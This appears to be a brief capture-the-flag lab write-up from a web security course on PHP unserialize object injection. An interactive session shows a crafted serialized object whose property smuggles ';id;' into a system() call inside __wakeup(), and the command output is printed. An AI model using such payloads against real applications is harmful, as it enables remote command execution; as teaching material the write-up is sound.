# Simple Web 0x16.5(php unserialize) ###### tags: `NTUSTWS` `CTF` `Web` ## Background php magic method  ## Source code ```php= class cat { public $sound = 'ls'; function __wakeup() { system("echo".$this->sound); } } $cat = unserialize($_GET['cat']); ``` ## Description & Analyze ```bash! $ php -a php > class cat php > public { php { public $sound = 'ls'; php { function __wakeup() php { { php { system("echo ".$this->sound); php { } php { } php > $_GET['cat']='O:3:"cat":1:{s:5:"sound";s:4:"meow";}'; php > $cat = unserialize($_GET['cat']); meow php > $_GET['cat']='O:3:"cat":1:{s:5:"sound";s:4:";id;";}'; php > $cat = unserialize($_GET['cat']); uid=1000(sbk6401) gid=1000(sbk6401) groups=1000(sbk6401),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),117(netdev),1001(docker) ``` This is a typical command injection. The magic method `__wakeup()` will be called when unserialized something. ## Reference